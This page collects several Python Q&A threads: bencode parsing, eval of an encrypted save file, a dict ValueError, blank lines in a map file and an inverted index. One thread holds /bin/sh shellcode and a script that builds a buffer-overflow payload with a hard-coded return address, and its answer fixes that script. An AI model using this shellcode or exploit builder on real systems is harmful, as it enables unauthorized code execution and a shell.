How to decode bencoded torrent data - python

I'm trying to extract size and name from a torrent file with decoding the content of a torrent file with bencode.
I did pip install bencode then I tested with one of the line of a torrent file as you can see there.
import bencode
blabla = 'd8:announce70:http://tracker.t411.io:56969/c5faa6720249d33ff6ba2af48640af89/announce7:comment29:https://www.t411.io/t/524280210:created by19:https://www.t411.io13:creation datei1431685353e4:infod6:lengthi14634059e4:name22:Charlie-Hebdo-1178.pdf12:piece lengthi262144e6:pieces1120:'
myprint = bencode.decode_string(blabla,1)
print myprint
This is the file that pip install put in the python lib:
from BTL import BTFailure
def decode_int(x, f):
f += 1
newf = x.index('e', f)
n = int(x[f:newf])
if x[f] == '-':
if x[f + 1] == '0':
raise ValueError
elif x[f] == '0' and newf != f+1:
raise ValueError
return (n, newf+1)
def decode_string(x, f):
colon = x.index(':', f)
n = int(x[f:colon])
if x[f] == '0' and colon != f+1:
raise ValueError
colon += 1
return (x[colon:colon+n], colon+n)
def decode_list(x, f):
r, f = [], f+1
while x[f] != 'e':
v, f = decode_func[x[f]](x, f)
r.append(v)
return (r, f + 1)
def decode_dict(x, f):
r, f = {}, f+1
while x[f] != 'e':
k, f = decode_string(x, f)
r[k], f = decode_func[x[f]](x, f)
return (r, f + 1)
decode_func = {}
decode_func['l'] = decode_list
decode_func['d'] = decode_dict
decode_func['i'] = decode_int
decode_func['0'] = decode_string
decode_func['1'] = decode_string
decode_func['2'] = decode_string
decode_func['3'] = decode_string
decode_func['4'] = decode_string
decode_func['5'] = decode_string
decode_func['6'] = decode_string
decode_func['7'] = decode_string
decode_func['8'] = decode_string
decode_func['9'] = decode_string
def bdecode(x):
try:
r, l = decode_func[x[0]](x, 0)
except (IndexError, KeyError, ValueError):
raise BTFailure("not a valid bencoded string")
if l != len(x):
raise BTFailure("invalid bencoded value (data after valid prefix)")
return r
from types import StringType, IntType, LongType, DictType, ListType, TupleType
class Bencached(object):
__slots__ = ['bencoded']
def __init__(self, s):
self.bencoded = s
def encode_bencached(x,r):
r.append(x.bencoded)
def encode_int(x, r):
r.extend(('i', str(x), 'e'))
def encode_bool(x, r):
if x:
encode_int(1, r)
else:
encode_int(0, r)
def encode_string(x, r):
r.extend((str(len(x)), ':', x))
def encode_list(x, r):
r.append('l')
for i in x:
encode_func[type(i)](i, r)
r.append('e')
def encode_dict(x,r):
r.append('d')
ilist = x.items()
ilist.sort()
for k, v in ilist:
r.extend((str(len(k)), ':', k))
encode_func[type(v)](v, r)
r.append('e')
encode_func = {}
encode_func[Bencached] = encode_bencached
encode_func[IntType] = encode_int
encode_func[LongType] = encode_int
encode_func[StringType] = encode_string
encode_func[ListType] = encode_list
encode_func[TupleType] = encode_list
encode_func[DictType] = encode_dict
try:
from types import BooleanType
encode_func[BooleanType] = encode_bool
except ImportError:
pass
def bencode(x):
r = []
encode_func[type(x)](x, r)
return ''.join(r)
The fact is that I don't really understand how can I decode my line with this bencode.
I already tried the def bdecode but this is the output:
root#debian:/home/florian/Téléchargements# python decript.py
Traceback (most recent call last):
File "decript.py", line 4, in <module>
myprint = bencode.bdecode(blabla)
File "/usr/local/lib/python2.7/dist-packages/bencode/__init__.py", line 68, in bdecode
raise BTFailure("not a valid bencoded string")
bencode.BTL.BTFailure: not a valid bencoded string
So I tried with the def decode_string but with decode_string(blabla, 1) it decode only the first word:
root#debian:/home/florian/Téléchargements# python decript.py
('announce', 11)
and the number like 2, 3, 4 don't work and display error like:
root#debian:/home/florian/Téléchargements# python decript.py
Traceback (most recent call last):
File "decript.py", line 4, in <module>
myprint = bencode.decode_string(blabla,10)
File "/usr/local/lib/python2.7/dist-packages/bencode/__init__.py", line 29, in decode_string
n = int(x[f:colon])
ValueError: invalid literal for int() with base 10: 'e70'
I want to decode all the line and I don't understand how can I do it with this bencode for example.

The string you're trying to decode seems to be truncated. it ends in pieces1120:, indicating that at least 1120 bytes should follow.
BEncoding is a binary format. It's only partially human-readable and not meant to be embedded in charset-sensitive things such as source code files. I suggest you read it straight from a file.

You have an incomplete Bencoded string.
The first part tells you there is a dictionary:
d...
which is supposed to be parsed until there is an e character. There is no such character in your input string.
A manual parse shows you have the keys announce, comment, created by, creation date, and info, where the latter is a nested dictionary with length, name, piece-length and pieces. Then your string stops; there is no value for pieces, and no e to mark the end of either the outer dictionary or the nested info dictionary. All we have is the type and length indicator: 1120.
You could try and use the decoding functions directly, but then take into account that they return the value and the offset:
>>> bencode.decode_string(blabla, 1)
('announce', 11)
11 is the offset for the next value:
>>> bencode.decode_string(blabla, 11)
('http://tracker.t411.io:56969/c5faa6720249d33ff6ba2af48640af89/announce', 84)
and 84 is again the next:
>>> bencode.decode_string(blabla, 84)
('comment', 93)
If you take into account that the string is incomplete and that not all encoded objects are strings, you can still decode what little is there.
The offset also tells you what function to use for decoding:
>>> blabla[1]
'8'
>>> bencode.decode_func[blabla[1]]
<function decode_string at 0x1004632a8>
The number here spells out how many characters to expect. So skipping the failing d dictionary mapping you get:
>>> offset = 1
>>> while True:
... value, offset = bencode.decode_func[blabla[offset]](blabla, offset)
... print value
...
announce
http://tracker.t411.io:56969/c5faa6720249d33ff6ba2af48640af89/announce
comment
https://www.t411.io/t/5242802
created by
https://www.t411.io
creation date
1431685353
info
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "/Users/mj/Development/venvs/stackoverflow-2.7/lib/python2.7/site-packages/bencode/__init__.py", line 44, in decode_dict
while x[f] != 'e':
IndexError: string index out of range
which fails because you hit the nested dictionary without e. You could extract those keys too, by adding one to the last offset:
>>> offset
194
>>> blabla[offset]
'd'
>>> offset += 1
>>> while True:
... value, offset = bencode.decode_func[blabla[offset]](blabla, offset)
... print value
...
length
14634059
name
Charlie-Hebdo-1178.pdf
piece length
262144
pieces
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
IndexError: string index out of range
Or you could just read the data as binary data and not truncate it:
with open(torrentfilename, 'rb') as torrentfile:
torrent = bencode.bdecode(torrentfile.read())
# now you have a dictionary.

Related

How to get around "source code string cannot contain null bytes" when eval is run without removing the null bytes

I have a program where I encrypt class.__dict__ and save it to a file in an array so the file looks something like this -
{'some name':[1, 2, 3],
'data':'''𚶩9È𚵶𚶛𚵝X§Ë¡¡Ö©𚶕 î𚶣o𚶥[𚵶𚶎 y𚵽𚵮^𚵜𚶩5Ð¥"¢§«!𚵩𚶅𚶚𚵰fa¥𚶯m𚵬c𚶮^𚵵W𚵴𚶭''' #somthing like this but a lot longer
}
I then read it and need to decrypt data but before that, I need to get the data from the array that is currently a string which I did with eval(fileContent) and it gives me the error -
Traceback (most recent call last):
File "C:/Users/stemb/Documents/programing/python/programs/img editor/__init__.py", line 127, in
<module>
main()
File "C:/Users/stemb/Documents/programing/python/programs/img editor/__init__.py", line 102, in main
save_code.auto_save_load()
File "C:\Users\stemb\Documents\programing\python\programs\img editor\save_code.py", line 153, in
auto_save_load
data = eval(fileContent)
ValueError: source code string cannot contain null bytes
My reading function is this
data = open("./save." + GLOBAL.fileType, "r", encoding="utf-8").read()
json.loads gives json.decoder.JSONDecodeError: Expecting property name enclosed in double quotes: line 1 column 2 (char 1)
My code is -
# imports
import json
import random
import time
print("Finished save_progress imports")
def encrypt(obj, log=0): #encrypt
# set data
data = str(obj.__dict__)
key = "codeAsciEightAndMabyA_Seven" + str(time.time()) # crate key
key = list(key)
random.shuffle(key) # randomize key
cryptionKeys = list()
encrypted = list()
iMinus = 0
for i in range(len(data)): # create a random + or - for extra security
cryptionKeys.append(random.choice(("+", "-")))
# encode part
for i, c in enumerate(data):
# set individual data
charAsci = ord(c)
cryptionKey = cryptionKeys[i]
done = 0
while done == 0:
try:
charKey = ord(key[i - iMinus])
done = 1
except IndexError:
iMinus += len(key)
if cryptionKey == "+":
encryptedOrd = charAsci + charKey
else:
encryptedOrd = charAsci - charKey
if encryptedOrd < 0:
encryptedOrd += 110000
cryptionKeys[i] = "="
cryptionKey = cryptionKeys[i]
encryptedChar = chr(encryptedOrd)
encrypted.append(encryptedChar)
if log == 1:
print("charNumb \/")
print(i)
print("charAsci \/")
print(charAsci)
print("cryptionKey \/")
print(cryptionKey)
print("charKey \/")
print(charKey)
print("encryptedOrd \/")
print(encryptedOrd)
print("encryptedChar \/")
print(encryptedChar)
print()
encrypted2 = encrypted
encrypted = ""
for c in encrypted2:
encrypted += c
return str(encrypted), str(key), str(cryptionKeys)
def auto_save(GLOBAL): # the save func
file = open("./save." + GLOBAL.fileType, "w", encoding="utf-8")
encryptedGLOBAL, key, cryptionKeys = encrypt(GLOBAL)
out = ("{'key':" + str(key) + ", 'cryptionKeys':" + str(cryptionKeys) + ", 'data':'''" + str(
encryptedGLOBAL) + "'''}")
print(out)
file.write(out)
file.close()
def auto_save_load(aclass): # the loading dunc
data = open("./save." + GLOBAL.fileType, "r", encoding="utf-8").read()
data = eval(data)
key = data["key"]
cryptionKeys = data["cryptionKeys"]
encryptedGLOBAL = data["data"]
print(key)
print()
print(cryptionKeys)
print()
print(encryptedGLOBAL)
Other answers have said to remove the null bytes but the encryption method needs them.
Please help.

How to write byte-list to file Python?

I have a list of bytes that I want to write as a binary file:
This is what I have:
import struct as st
shellcode = bytearray("\xeb\x1f\x5e\x89\x76\x08\x31"+
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"+
"\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"+
"\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh")
def generateexploitmessage(nops, retaddr):
message = []
for x in xrange(0,128):
message += st.pack(">I",retaddr)
print(message)
for x in xrange(0,len(shellcode)):
message[x] = shellcode[x]
print(message)
print(len(message))
return message
def reversebyteorder(arg):
returnarray = []
for x in xrange(0,len(arg),4):
temparray = bytearray(arg[x:x+4])[::-1]
print temparray
returnarray += temparray
return returnarray
def writebytestofile(message):
f = open("pyexploit.bin",'wb')
print message
f.write(message)
f.close()
def main():
print shellcode
exploit =generateexploitmessage(0,0xbffff614)
readyexploit = reversebyteorder(exploit)
writebytestofile(readyexploit)
if __name__ == '__main__':
main()
The error message I'm getting is the following:
Traceback (most recent call last):
File "generateexploit.py", line 47, in <module>
main()
File "generateexploit.py", line 43, in main
writebytestofile(readyexploit)
File "generateexploit.py", line 35, in writebytestofile
f.write(message)
TypeError: argument 1 must be string or buffer, not list
I understand that I somehow need to convert my list or what I have to a writable format, but I have no idea how. I have tried to put a bytearray(message) where I write the final message to the file, but that didnt help.
Bot generateexploitmessage() and reversebyteorder() produce a list of bytes (integers), not a bytesarray(). Wrap the result in a bytearray() again before writing:
f.write(bytearray(message))
Alternatively, stick to producing a bytearray earlier; there is no need to use lists here:
def generateexploitmessage(nops, retaddr):
message = bytearray()
for x in xrange(128):
message += st.pack(">I", retaddr)
message[:len(shellcode)] = shellcode
return message
def reversebyteorder(arg):
returnarray = bytearray()
for x in xrange(0, len(arg), 4):
temparray = bytearray(arg[x:x + 4])[::-1]
returnarray += temparray
return returnarray

ValueError: dictionary update sequence element #6 has length 1; 2 is required

I have some Python code meant to take some data and recreate a string from that data, but I'm receiving an error.
def remove_cruft(s):
return s[1:-2]
import re
filetouse = input("What file would you like to use?\n>>>")
filetouse = filetouse + ".txt"
f = open(filetouse,"r")
lines = f.readlines()
indexlist = lines[2]
indexdict = lines[1]
indexdict = indexdict.split()
indexdict.remove("['")
indexdict.remove("']")
for item in indexdict:
if "'," in indexdict:
indexdict.remove("',")
if "'" in indexdict:
indexdict.remove("'")
if '",' in indexdict:
indexdict.remove('",')
if '"' in indexdict:
indexdict.remove('"')
indexdict = str(indexdict)
indexdict = indexdict[1:-1]
indexdict.replace(" ", "")
dict(x.split('=') for x in indexdict.split(','))
print(indexlist)
print(indexdict)
newindexlist = remove_cruft(indexlist)
newindexlist = re.findall(r"[\w']+|[.,!?;]", newindexlist)
del newindexlist[1::2]
print(newindexlist)
posindexdict = 0
finaloutput = []
print(finaloutput)
Error:
Traceback (most recent call last):
File "\\IOTA\ControlledAssessment\assess87\My Documents\Python\Task 3\Decompression v1.3.py", line 31, in <module>
dict(x.split('=') for x in indexdict.split(','))
ValueError: dictionary update sequence element #6 has length 1; 2 is required
One of the parameter options for dict is an iterable of iterables of which each has exactly two objects:
>>> dict((('a', 1), ('b', 1)))
{'a': 1, 'b': 1}
Your code is trying to pass in an iterable where one of the sub iterables has only one object:
>>> dict((('a', 1), ('b')))
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ValueError: dictionary update sequence element #1 has length 1; 2 is required
Based on the output it seems that 7th element in your data is not in the format you expect.

Trouble iterating through lines in a file in Python

I have a class that simulates a scenario for calculating paths in a network using the distance vector routing algorithm. The class has an attribute, map_file, which is the name of a file that describes the connections in the network. Here is a snippet of code from the DVSimulator class:
def populate_map(self):
with open(self.map_file,'r') as f:
for line in f:
data = line.split()
length_of_link = data[2]
...
There is a file called "test_map1". It looks like this:
A B 2.1
B C 1.2
A C 1.0
C D 1.5
Every line in the file indicates a connection between two nodes. Here, Node A is connected to Node B with a distance of 2.1, Node B to Node C with a distance of 1.2, etc.
Here is the setUp() method from my pyunit TestDVSimulator class:
def setUp(self):
self.split_horizon_simulator1 = dv_simulator.DVSimulator("test_map1",True)
self.no_split_simulator1 = dv_simulator.DVSimulator("test_map1", False)
self.split_horizon_simulator2 = dv_simulator.DVSimulator("test_map2",True)
self.no_split_simulator2 = dv_simulator.DVSimulator("test_map2",True)
Here is a snippet of code from the test_populate_map() method in the TestDVSimulator class:
def test_populate_map(self):
"""Tests the populate_map() method in DVSimulator"""
splitty1 = self.split_horizon_simulator1
no_splitty1 = self.no_split_simulator1
splitty2 = self.split_horizon_simulator2
no_splitty2 = self.no_split_simulator2
splitty1.populate_map()
no_splitty1.populate_map()
splitty2.populate_map()
splitty2.populate_map()
...
Now, when I try to unittest the populate_map() method using the map_file shown above I get the following error message:
ERROR: Tests the populate_map() method in DVSimulator
----------------------------------------------------------------------
Traceback (most recent call last):
File "dv_simulator_test.py", line 28, in test_populate_map
splitty1.populate_map()
File "/home/grads/klepp/6760/DistanceVectorProject/dv_simulator.py", line 33, in populate_map
length_of_link = data[2]
IndexError: list index out of range
However, I know that each line in the file has length 3, and so data[2] is most definitely not out of range. Interestingly, if edit the populate_map() method as follows:
def populate_map(self):
with open(self.map_file,'r') as f:
for line in f.readlines():
print "line from map file: " + line
data = line.split()
print "data: " + str(data)
print str(data[0])
print str(data[1])
print str(data[2])
length_of_link = data[2]
...
the output looks like this:
line from map file: A B 2.1
data: ['A', 'B', '2.1']
A
B
2.1
line from map file: B C 1.2
data: ['B', 'C', '1.2']
B
C
1.2
line from map file: A C 1.0
data: ['A', 'C', '1.0']
A
C
1.0
line from map file: C D 1.5
data: ['C', 'D', '1.5']
C
D
1.5
line from map file:
data: []
EF
======================================================================
ERROR: Tests the populate_map() method in DVSimulator
----------------------------------------------------------------------
Traceback (most recent call last):
File "dv_simulator_test.py", line 28, in test_populate_map
splitty1.populate_map()
File "/home/grads/klepp/6760/DistanceVectorProject/dv_simulator.py", line 30, in populate_map
print str(data[0])
IndexError: list index out of range
That is to say, that str(data[0]) clearly prints out some value, in fact it prints it out four times in a row, but then it says that data[0] is out of range nonetheless. For some reason the code seems to be iterating through the lines in the file and calling line.split() on each line before it runs the line of code for length_of_link = data[2].
Does anyone know what is going wrong and how I can fix this?
Here is the full script of the populate_map() method in the DVSimulator class:
#The DVSimulator class simulates a Distance Vector Routing scenario
import routingtable
import dv_router
class DVSimulator:
def __init__(self, map_file, split_horizon,verbosity = False, test_destination=''):
self.routers_dictionary = {}
self.neighbors_dictionary = {} #a dictionary of router:dict pairs where dict is a dictionary of router values keyed by their names
self.breakables = [] #string tuples of (router1, router2) signifying a link to break upon convergence
self.using_split_horizon = split_horizon
self.map_file = map_file
self.verbose = verbosity
self.number_of_iterations = 0
self.test_dest = test_destination
def populate_map(self):
with open(self.map_file,'r') as f:
for line in f:
print "line from map file: " + line
data = line.split()
print "data: " + str(data)
print str(data[0])
print str(data[1])
print str(data[2])
length_of_link = data[2]
if len(data) == 4:
breakables.append((data[0],data[1]))
router1 = data[0]
router2 = data[1]
neighbor_pair = [router1, router2]
for each in neighbor_pair:
if each == router1:
other = router2
else:
other = router1
if each not in self.routers_dictionary:
self.routers_dictionary[each] = dv_router.DVRouter(each, self.using_split_horizon)
self.neighbors_dictionary[each] = {}
for router in self.routers_dictionary:
if router != other:
self.routers_dictionary[router].add_link(each)
self.routers_dictionary[each].routing_table.edit_distance_to(each, 0, each)
for each in neighbor_pair:
if each == router1:
other = router2
else:
other = router1
self.routers_dictionary[each].add_link(other,length_of_link)
self.neighbors_dictionary[each][other] = self.routers_dictionary[other]
The error lies in the test_map1 file. At the end of the file is a blank line. If the line is removed, the code runs as expected. An if statement, as suggested, could also be added to branch correctly for blank lines.

Positional Inverted Index in Python

I recently developed a Python program that makes an inverted index out of terms in a certain document. I now want to create position postings, such as
to, 993427:
⟨ 1, 6: ⟨7, 18, 33, 72, 86, 231⟩;
2, 5: ⟨1, 17, 74, 222, 255⟩; 4, 5: ⟨8, 16, 190, 429, 433⟩; 5, 2: ⟨363, 367⟩;
7, 3: ⟨13, 23, 191⟩; …⟩
I know the code is not complete as described above, I'm just trying to implement functionality.
from pprint import pprint as pp
from collections import Counter
import pprint
import re
import sys
import string
import fileinput
try:
reduce
except:
from functools import reduce
try:
raw_input
except:
raw_input = input
def readIn(fileglob): #Reads in multiple files and strips punctation/uppercase.
texts, words = {}, set()
for txtfile in (fileglob):
with open(txtfile, 'r') as splitWords:
txt = splitWords.read().lower().split()
txt = str(txt)
txt = re.findall(r'\w+', txt)
words |= set(txt)
texts[txtfile.split('\\')[-1]] = txt
return texts, words
def search(indexes): # Inverted index, based off the book and the web.
return reduce(set.intersection,
(index[word] for word in indexes),
set(texts.keys()))
def getWordBins(posOfWords):
cnt = Counter()
for word in posOfWords:
cnt[posOfWords] += 1
return cnt
def main(fileList, topWords):
tempArray = []
for x in range(1,len(fileList)):
tempArray.append(fileList[x])
texts, words = readIn(tempArray)
index = {word:set(txt
for txt, wrds in texts.items() if word in wrds)
for word in words}
test =({k + " " + str(len(v)) + " " + str(sorted(v)) for k,v in index.items()})
txt = readIn(fileList)
posWord = getWordBins(txt)
for key, value in posWord.most_common(topWords):
print key, value
#Writes out the information requested to a ".idx" file.
doc = open("document.idx", "w")
doc.write("# INPUT DOCUMENT REFERENCE LEGEND\n")
for fileNumber in range(1, len(fileList)):
doc.write(str(fileNumber) + "\t" + fileList[fileNumber] + "\n")
doc.write("# INVERTED INDEX RESULTS\n")
tempTest = []
for x in test:
tempTest.append(x.split(" "))
for x in tempTest:
tempStr = ""
for y in x:
tempStr += y + "\t"
doc.write(tempStr + "\n")
doc.close
main(sys.argv, sys.argv)
This is what I have so far, the only new functionality is the getWordBins function, and the loop:
txt = readIn(fileList)
posWord = getWordBins(txt)
for key, value in posWord.most_common(topWords):
print key, value
Now, what happens when I try to run the code is this:
Traceback (most recent call last):
File "Intro3.py", line 82, in <module>
main(sys.argv, sys.argv)
File "Intro3.py", line 60, in main
posWord = getWordBins(txt)
File "Intro3.py", line 41, in getWordBins
cnt[posOfWords] += 1
TypeError: unhashable type: 'dict'
Any guidance with this troubling error is gladly received. It is not a dictionary, so why the error?
Thanks for your time!
Where you're doing:
cnt[posOfWords] += 1
I think you might mean:
cnt[word] += 1
Your readin function also returns a dict and a set, so your txt variable is a tuple of (dict, set)
So your problem boils down to trying to use a tuple holding a dict as a key (which I doubt is your intent). And it wouldn't work for cnt[word] += 1, because that would still be trying to use a dict as a key too. You need to do this, probably:
txt, _ = readIn(fileList)
and then this might work:
cnt[word] += 1

Categories